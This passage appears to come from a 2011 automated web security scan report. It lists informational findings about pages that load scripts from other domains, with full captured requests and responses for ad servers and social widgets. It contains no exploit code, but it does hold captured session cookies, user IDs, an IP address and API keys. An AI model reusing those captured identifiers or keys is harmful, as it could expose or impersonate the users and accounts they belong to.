lkIjoiMC4wMCIsImFkIjoxMTc4MTUsICJidXkiOjkwMCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6Ik1lZGlhNiBEZWdyZWVzIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MjE0MTA3OSwgImJ1eSI6MzMxMSwibHAiOiJodHRwOi8vd3d3LnZpcmdpbmFtZXJpY2EuY29tL3Z4L2Jvb2tpbmcvZXhpdC1oYXBwaWVyP2NpZD1kaXNfMDAwNzYiLCJhbiI6IiIsInN0YXR1cyI6IjEuMjMgTiIsImZpZCI6NDg5MiwgImZjcG0iOiIxLjc1In0seyJuZXR3b3JrX25hbWUiOiJUdWJlbW9ndWwgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo1ODk1ODA4LCAiYnV5Ijo4NDcxLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlR1cm4gKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo2Mjg5NywgImJ1eSI6MTg5LCJscCI6Imh0dHA6Ly93ZWxjb21lLmhwLmNvbS9jb3VudHJ5L3VzL2VuL2NzL2hvbWVfYy5odG1sIiwiYW4iOiJIUCBEaXJlY3QiLCJzdGF0dXMiOiIwLjEyIiwiZmlkIjo0ODkyLCAiZmNwbSI6IjEuNzUifSx7Im5ldHdvcmtfbmFtZSI6IkRhdGFYdSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjYyOTc5LCAiYnV5IjoxOTksImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9XSwgIHRhcmdldGluZzogICAgIiIsICBhZHZlcnRpc2VyOiAgICAiIiwgIGxhbmRpbmdfcGFnZTogICAgIiIsICBob3N0OiAgICAgICAgICJuai10YWcxMiJ9
Content-Length: 1629
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:21:19 GMT
Connection: close
Set-Cookie: D41U=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA; expires=Mon, 09-May-2011 16:21:19 GMT; path=/; domain=.tag.admeld.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">


<s
...[SNIP]...
<div style="width:0;height:0">


<script type="text/javascript" src="http://adserver.veruta.com/cookiematch.fcgi?pnid=3000003&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=567&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match"></script>
...[SNIP]...
rovider_id%3D21%26external_user_id%3D%24BK_UUID%26_m%3D1&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_dataprovider_id=21&admeld_callback=http://tag.admeld.com/pixel"/>

<script type="text/javascript" src="http://bh.contextweb.com/bh/sync/admeld?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=8&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match"></script>
...[SNIP]...
11.32. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnews/300x250/politics-bottom

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ad/iframe/3/foxnews/300x250/politics-bottom?t=1302539475030&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024e; D41U=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3MiLCAgYWQ6ICAgICAgICAgICAzMTM4NzI2LCAgbmV0d29yazogICAgICAiYWRjb20iLCAgc2l6ZTogICAgICAgICAiMzAweDI1MCIsICBmcmVxOiAgICAgICAgICI3LTciLCAgZGVmYXVsdHM6ICAgICAiMC0wIiwgIHJlcXVlc3Q6ICAgICAgIjUxYjdmZDUwLTc0ZGEtNDU0NS04OGU4LTFlMzBjNDEyOTUwZiIsICB1c2VyOiAgICAgICAgICJlMzZhMmYyMC05OTg1LTRkY2QtODJlOS02ZmYwMzEyZTAyNGUiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgInBvbGl0aWNzLWJvdHRvbSIsICBkaXY6ICAgICAgICAgICI1MWI3ZmQ1MC03NGRhLTQ1NDUtODhlOC0xZTMwYzQxMjk1MGYiLCAgdXJsOiAgICAgICAgICAiaHR0cDovL3d3dy5mb3huZXdzLmNvbS9wb2xpdGljcy9pbmRleC5odG1sIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgImFkIiwgIGltcDogICAgICAgICAgNTYsICBuZXR3b3JrX2lkOiAgIDEsICBhY2NvdW50X2lkOiAgIDEzLCAgbmV0d29ya19uYW1lOiAiQWR2ZXJ0aXNpbmcuY29tIiwgIHB1Ymxpc2hlcl9uYW1lOiAiZm94bmV3cyIsICBlY3BtOiAgICAgICAgICIwLjUyIiwgIGZlY3BtOiAgICAgICAgIjAuNTIiLCAgZmlsbDogICAgICAgICAiMTAuMDEiLCAgcGxhY2VtZW50OiAgICAicG9saXRpY3MtYm90dG9tIiwgIHJ1bGU6ICAgICAgICAgInBvbGl0aWNzLWJvdHRvbSIsICBjcmVhdGl2ZV9pZDogICIiLCAgYmlkZGVyczogICAgICBbeyJuZXR3b3JrX25hbWUiOiJBcHBOZXh1cyAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjYyOTY3LCAiYnV5IjoxMTEsImxwIjoiaHR0cDovL2hvbWVkb2xsYXJzLm5ldCIsImFuIjoiIiwic3RhdHVzIjoiMS40MSBOIiwiZmlkIjo1MDgsICJmY3BtIjoiMi4yNSJ9LHsibmV0d29ya19uYW1lIjoiTWF4UG9pbnQgSW50ZXJhY3RpdmUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo2MzA0OSwgImJ1eSI6MTc2LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IkRhdGFYdSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjYyOTc5LCAiYnV5IjoxOTksImxwIjoid3d3LmFydGluc3RpdHV0ZXMuZWR1IiwiYW4iOiJBcnQgSW5zdGl0dXRlcyIsInN0YXR1cyI6IjAuMTIiLCJmaWQiOjUwOCwgImZjcG0iOiIyLjI1In0seyJuZXR3b3JrX25hbWUiOiJNZWRpYU1hdGggKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoxOTcxODEsICJidXkiOjUwMywibHAiOiJodHRwOi8vbWVhbmluZ2Z1bGJlYXV0eS5jb20iLCJhbiI6IiIsInN0YXR1cyI6IjAuMDMiLCJmaWQiOjUwOCwgImZjcG0iOiIyLjI1In0seyJuZXR3b3JrX25hbWUiOiJ4KzEgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoxMTc4MTUsICJidXkiOjkwMCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJNZWRpYTYgRGVncmVlcyAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjIxNDEwNzksICJidXkiOjMzMTEsImxwIjoiaHR0cDovL3d3dy52aXJnaW5hbWVyaWNhLmNvbS92eC9ib29raW5nL2V4aXQtaGFwcGllcj9jaWQ9ZGlzXzAwMDc2IiwiYW4iOiIiLCJzdGF0dXMiOiIxLjIzIE4iLCJmaWQiOjUwOCwgImZjcG0iOiIyLjI1In0seyJuZXR3b3JrX25hbWUiOiJUdWJlbW9ndWwgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo1ODk1ODA4LCAiYnV5Ijo4NDcxLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlR1cm4gKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo2Mjg5NywgImJ1eSI6MTg5LCJscCI6Imh0dHA6Ly93ZWxjb21lLmhwLmNvbS9jb3VudHJ5L3VzL2VuL2NzL2hvbWVfYy5odG1sIiwiYW4iOiJIUCBEaXJlY3QiLCJzdGF0dXMiOiIwLjEyIiwiZmlkIjo1MDgsICJmY3BtIjoiMi4yNSJ9XSwgIHRhcmdldGluZzogICAgIiIsICBhZHZlcnRpc2VyOiAgICAiIiwgIGxhbmRpbmdfcGFnZTogICAgIiIsICBob3N0OiAgICAgICAgICJuai10YWcyNSJ9
Content-Length: 994
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:31:18 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">


<s
...[SNIP]...
<div style="width:0;height:0">


<script type="text/javascript" src="http://um.simpli.fi/am_match?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=338&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match"></script>
...[SNIP]...
11.33. http://tag.admeld.com/ad/iframe/3/foxnewsrtb/728x90/ros  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnewsrtb/728x90/ros

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ad/iframe/3/foxnewsrtb/728x90/ros?t=1302538875852&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024e

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3NydGIiLCAgYWQ6ICAgICAgICAgICAzMzU4NzQsICBuZXR3b3JrOiAgICAgICJtYXhwb2ludCIsICBzaXplOiAgICAgICAgICI3Mjh4OTAiLCAgZnJlcTogICAgICAgICAiMi05OTkiLCAgZGVmYXVsdHM6ICAgICAiMC0wIiwgIHJlcXVlc3Q6ICAgICAgIjMxMjMwMTUyLTljNzItNGZhOC1iZDc2LWI1YmRhMTY0ZTQ2MCIsICB1c2VyOiAgICAgICAgICJlMzZhMmYyMC05OTg1LTRkY2QtODJlOS02ZmYwMzEyZTAyNGUiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgInJvcyIsICBkaXY6ICAgICAgICAgICIzMTIzMDE1Mi05YzcyLTRmYTgtYmQ3Ni1iNWJkYTE2NGU0NjAiLCAgdXJsOiAgICAgICAgICAiaHR0cDovL3d3dy5mb3huZXdzLmNvbS9wb2xpdGljcy9pbmRleC5odG1sIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgInJlYWwtdGltZSBiaWQiLCAgaW1wOiAgICAgICAgICAyLCAgbmV0d29ya19pZDogICAyMzMsICBhY2NvdW50X2lkOiAgIDYyODksICBuZXR3b3JrX25hbWU6ICJNYXhQb2ludCBJbnRlcmFjdGl2ZSAoUlRCKSIsICBwdWJsaXNoZXJfbmFtZTogImZveG5ld3MiLCAgZWNwbTogICAgICAgICAiMS43NiIsICBmZWNwbTogICAgICAgICIxLjc2IiwgIGZpbGw6ICAgICAgICAgIjEwMC4wMCIsICBwbGFjZW1lbnQ6ICAgICJyb3MiLCAgcnVsZTogICAgICAgICAicm9zIiwgIGNyZWF0aXZlX2lkOiAgIiIsICBiaWRkZXJzOiAgICAgIFt7Im5ldHdvcmtfbmFtZSI6Ik1heFBvaW50IEludGVyYWN0aXZlIChSVEIpIiwgImJpZCI6IjMuMDEiLCJhZCI6MzM1ODc0LCAiYnV5IjoxNzgsImxwIjoiaHR0cDovL3d3dy50eXNvbi5jb20vQ29uc3VtZXIvUHJvZHVjdHMvUHJvbW90aW9ucy9VbHRpbWF0ZUNoaWNrZW5TYW5kd2ljaC5hc3B4P2NtcGlkPVNhbmR3aWNoQW55TmlnaHRHU05ldHdvcmsiLCJhbiI6IiIsInN0YXR1cyI6IjMuMDEiLCJmaWQiOjQ4OTIsICJmY3BtIjoiMS43NSJ9LHsibmV0d29ya19uYW1lIjoiTWVkaWFNYXRoIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzM1OTEwLCAiYnV5Ijo1MDQsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiTWVkaWE2IERlZ3JlZXMgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoyMTQxMTE2LCAiYnV5IjozMzEyLCJscCI6Imh0dHA6Ly93d3cudmlyZ2luYW1lcmljYS5jb20vdngvYm9va2luZy9leGl0LWhhcHBpZXI/Y2lkPWRpc18wMDA3NiIsImFuIjoiIiwic3RhdHVzIjoiMS4yMyBOIiwiZmlkIjo0ODkyLCAiZmNwbSI6IjEuNzUifSx7Im5ldHdvcmtfbmFtZSI6IlR1cm4gKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMzU4ODAsICJidXkiOjE5NiwibHAiOiJodHRwOi8vd2VsY29tZS5ocC5jb20vY291bnRyeS91cy9lbi9jcy9ob21lX2MuaHRtbCIsImFuIjoiSFAgRGlyZWN0Iiwic3RhdHVzIjoiMC4xNCIsImZpZCI6NDg5MiwgImZjcG0iOiIxLjc1In0seyJuZXR3b3JrX25hbWUiOiJEYXRhWHUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMzU4ODMsICJidXkiOjIwMCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn1dLCAgdGFyZ2V0aW5nOiAgICAiIiwgIGFkdmVydGlzZXI6ICAgICIiLCAgbGFuZGluZ19wYWdlOiAgICAiaHR0cDovL3d3dy50eXNvbi5jb20vQ29uc3VtZXIvUHJvZHVjdHMvUHJvbW90aW9ucy9VbHRpbWF0ZUNoaWNrZW5TYW5kd2ljaC5hc3B4P2NtcGlkPVNhbmR3aWNoQW55TmlnaHRHU05ldHdvcmsiLCAgaG9zdDogICAgICAgICAibmotdGFnMzcifQ==
Content-Length: 1304
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:21:18 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">


<script src="http://mpd.mxptint.net/1/S74.API/G1/T124/js?siz=728x90&mid=B1B_1F3FEDF2_3CE62FA&bp=3.01&sp=2.02&dm=Zm94bmV3cy5jb20&cp=3B9"></script>
...[SNIP]...
src="http://adadvisor.net/adscores/g.pixel?sid=9223635428&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_dataprovider_id=1&admeld_callback=http://tag.admeld.com/pixel"/>

<script type="text/javascript" src="http://a.tribalfusion.com/j.ad?site=admeldae&adSpace=audienceselect&size=1x1&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_dataprovider_id=10&admeld_callback=http://tag.admeld.com/pixel"></script>
...[SNIP]...
11.34. http://valtira.com/script/200.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://valtira.com
Path:   /script/200.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /script/200.jsp HTTP/1.1
Host: valtira.com
Proxy-Connection: keep-alive
Referer: http://valtira.com/page/1/valtira-Marketing-Tools.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VLTSID=rHTkRVaEF2pqO; JSESSIONID=3C47A68301185EB621E479EA2B81A26C.valtira-com-2; __utmz=152738878.1302308422.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=152738878.105465705.1302308422.1302308422.1302308422.1; __utmc=152738878; __utmb=152738878.1.10.1302308422; VLTALT=325428#valtira.com

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 00:20:34 GMT
Server: Apache
Cache-Control: max-age=3600
Vary: Accept-Encoding
Content-Type: text/javascript;charset=UTF-8
Content-Length: 20739

/**
* jquery.socialbutton - jQuery plugin for social networking websites
* http://itra.jp/jquery_socialbutton_plugin/
*
* Copyright 2010, Itrans, Inc. http://itra.jp/
*
* Dual licensed u
...[SNIP]...
</a>';

   $(target).html(tag);

   if (index == max_index) {
       $('body').append('<script type="text/javascript" src="http://static.mixi.jp/js/share.js"></script>
...[SNIP]...
</a>';

if(index == 0) {
    tag += '<script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...
</a>';

   $(target).html(tag);

   if (index == max_index) {
       $('body').append('<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
ggestNotebook': suggest_notebook,
       'contentId': content_id,
       'code': code,
       'title': title,
       'suggestTags': suggest_tags,
       'styling': styling
   });

   if (index == 0) {
       $('body').append('<script type="text/javascript" src="http://static.evernote.com/noteit.js"></script>
...[SNIP]...
</a>'
           + '<script type="text/javascript" src="http://b.st-hatena.com/js/bookmark_button.js" charset="utf-8" async="async"></script>
...[SNIP]...
11.35. http://wcax.upickem.net/engine/Splash.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wcax.upickem.net
Path:   /engine/Splash.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /engine/Splash.aspx?contestid=17178 HTTP/1.1
Host: wcax.upickem.net
Proxy-Connection: keep-alive
Referer: http://www.vermontopia.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
Set-Cookie: contestid=17178; expires=Tue, 09-Apr-2041 12:31:11 GMT; path=/
Set-Cookie: UPETemporaryShoppingCartID17178=36497604-4/9/2011 8:31:11 AM; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: 293976; expires=Tue, 09-Apr-2041 12:31:11 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID CUR PSDa OUR STP STA"
Date: Sat, 09 Apr 2011 12:31:11 GMT
Content-Length: 39215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>

       <script src="http://vermontopia.com/scripts/lang.js.php" language="javascript" type="text/javascript"></script>
       <script src="http://vermontopia.com/scripts/common.js" language="javascript" type="text/javascript"></script>
       <script src="http://vermontopia.com/scripts/location.js" language="javascript" type="text/javascript"></script>
       <script src="http://vermontopia.com/scripts/loadtheme.js" language="javascript" type="text/javascript"></script>
       <script src="http://vermontopia.com/scripts/advancedsearch.js" language="javascript" type="text/javascript"></script>
       <script src="http://vermontopia.com/scripts/contactclick.js" language="javascript" type="text/javascript"></script>
       <script src="http://vermontopia.com/scripts/cookies.js" language="javascript" type="text/javascript"></script>


                               <script src="http://vermontopia.com/scripts/jquery.js" language="javascript" type="text/javascript">$.preloadCssImages();</script>
<script src="http://vermontopia.com/scripts/jquery/jquery.cookie.js" type="text/javascript"></script>
               <script src="http://vermontopia.com/scripts/jquery/jquery.autocomplete.js" type="text/javascript"></script>
       <link href="http://vermontopia.com/scripts/jquery/jquery.autocomplete.css" rel="stylesheet" type="text/css" media="all" />
        <script type="text/javascript" src="http://vermontopia.com/scripts/jquery/jcrop/js/jquery.Jcrop.js"></script>
<link rel="stylesheet" href="http://vermontopia.com/scripts/jquery/jcrop/css/jquery.Jcrop.css" type="text/css" />
               <script src="http://vermontopia.com/scripts/jquery/jquery.thickbox.js" type="text/javascript"></script>
       <link href="http://vermontopia.com/scripts/jquery/thickbox/thickbox.css" rel="stylesheet" type="text/css" media="all" />
               <script type="text/javascript" src="http://vermontopia.com/scripts/jquery/jquery.selectbox.js"></script>
       <script src="http://vermontopia.com/scripts/review.js" language="javascript" type="text/javascript"></script>
...[SNIP]...
<link type="text/css" href="http://vermontopia.com/scripts/jquery/jquery_ui/css/smoothness/jquery-ui-1.7.2.custom.css" rel="stylesheet" />
<script type="text/javascript" src="http://vermontopia.com/scripts/jquery/jquery_ui/js/jquery-ui-1.7.2.custom.min.js"></script>

       <script language="javascript" type="text/javascript" src="http://vermontopia.com/scripts/checkusername.js"></script>
       <script language="javascript" type="text/javascript" src="http://vermontopia.com/scripts/socialbookmarking.js"></script>
...[SNIP]...
</head>

   <script src="http://maps.google.com/maps?file=api&amp;v=2&amp;sensor=true&amp;key=ABQIAAAAC-ql6H5r1qnVMqxBP63Z8hQw1gWJNEO1Cn5TQmwHwmBmp3h6FhQGIzG5Agxz3d54vos97_OkOX6cZA" type="text/javascript"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...
11.36. http://websiteoptimizer.blogspot.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://websiteoptimizer.blogspot.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?utm_source=gwohp&utm_medium=et&utm_campaign=promobox HTTP/1.1
Host: websiteoptimizer.blogspot.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Sat, 09 Apr 2011 00:17:48 GMT
Date: Sat, 09 Apr 2011 00:17:48 GMT
Last-Modified: Fri, 08 Apr 2011 21:37:44 GMT
ETag: "e0213802-228e-4449-8f65-4ab86d03d39b"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate
Age: 0
Content-Length: 74361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmln
...[SNIP]...
</style>
<script src='http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAA8oTp_KDiJ7gFvDuWWFfolxSsjpG0v6LKZNJMgOfcl5DRgehOGRS3tdb0znEuzRx4n3POfAbiiP1VSw' type='text/javascript'></script>
...[SNIP]...
</script>
<script src="http://www.google.com/reader/public/javascript-sub/user/10949413115399023739/label/ads?callback=build_posts" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://www.blogger.com/static/v1/widgets/1019049897-widgets.js"></script>
...[SNIP]...
11.37. http://wptz.placelocal.com/_js/ad.js.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wptz.placelocal.com
Path:   /_js/ad.js.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /_js/ad.js.php?clientID=7cbbc409ec990f19c78c75bd1e06f215&adWidth=300&adHeight=250&campaign_api=dispCamp.getNextCampaign&api_url=api.placelocal.com&domain_name=wptz.placelocal.com&tracking_url=tracking.placelocal.com HTTP/1.1
Host: wptz.placelocal.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 09 Apr 2011 12:30:51 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.2-1
Cache-Control: max-age=0
Expires: Sat, 09 Apr 2011 12:30:51 GMT
Vary: Accept-Encoding
Content-Length: 11049

var scripts_60mie0 = document.getElementsByTagName('script');var scriptEl_60mie0 = scripts_60mie0[ scripts_60mie0.length - 1 ];var scriptParent_60mie0 = scriptEl_60mie0.parentNode;var queryString_60mi
...[SNIP]...
OMContentLoaded', init, false);
/* for Internet Explorer*/
/*@cc_on @*/
/*@if (@_win32)
document.write('<script id=__ie_onload defer src=//0><\/scr'+'ipt>
...[SNIP]...
11.38. http://www.acquisio.com/wp-content/plugins/ilc-folding/folding.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acquisio.com
Path:   /wp-content/plugins/ilc-folding/folding.js

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /wp-content/plugins/ilc-folding/folding.js?ver=3.0 HTTP/1.1
Host: www.acquisio.com
Proxy-Connection: keep-alive
Referer: http://www.pagevester.com/en/product/Google-Website-Optimizer.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sat, 09 Apr 2011 00:18:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.2
Vary: Cookie
X-Pingback: http://www.acquisio.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 09 Apr 2011 00:18:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
